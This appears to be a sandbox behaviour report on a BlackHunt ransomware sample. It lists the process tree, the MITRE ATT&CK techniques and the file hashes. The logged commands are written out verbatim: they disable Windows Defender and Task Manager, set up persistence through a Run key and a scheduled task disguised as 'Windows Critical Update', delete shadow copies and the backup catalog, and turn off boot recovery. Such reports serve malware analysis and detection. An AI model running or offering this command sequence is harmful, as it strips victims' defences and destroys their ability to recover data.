C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe" /F2⤵PID:1504
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\e5381f1a8b8226c58d6349e03536857fa2724abe7cf406616c544caed4ea7a0b.exe" /F3⤵
- Creates scheduled task(s)
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2296
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4460
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3004
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3792
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4128
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4064
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4220
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4792
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4388
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2080
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4804
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4176
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59cbb7dd5507a8aa63b6d282804056cf5
SHA1148e9ee22c2dcb959cf472173a5dc94189d88771
SHA2568f18e796a698e8a1e248d4e0f7a79e5eae9fa79c19dc87d0ad3adacdca657a39
SHA512b11bfebf46132b5c789ce1c11ae778fc5faf2e07576322d2fd3a22f9aced7263736329f92cfbfbfbf89463f455d2cbf07ce02fef5a98427e301464893cfede67
-
Filesize
12KB
MD5d956f8fb2591590c90d9af552d23f861
SHA1667e75d9be768bbe40cb462da5078adeb50dfb7f
SHA2561779205a7619b8ff62c489318a66aa234d5704b17b1e126184606cf4cf7a3873
SHA512d57f630b18038378b27a673ee335d161e930fc251550677aff5b7e2896829de7c9c724ebf3863acf2b9ee4459b6d3ea3d2597a5e9724663a74da17e5a7d18b3b
-
Filesize
684B
MD5bfabc82dbe7fc5224f28a95c4c88c012
SHA127abcb458e5ffed3900313cce8000b31a6a4bcd8
SHA256b1da84a240f44198f06fd519a2c9f0d592d43879d1e8db70d2e53ec6b74a1586
SHA512afe2566840de3d913fcbaf9b182d5dec31ab0d129d3dbd1d69ff72d812cf01bdc83d6a890ffc215345bcc23ddb56cb5de5587ff3a85979a3d238708a246d1bee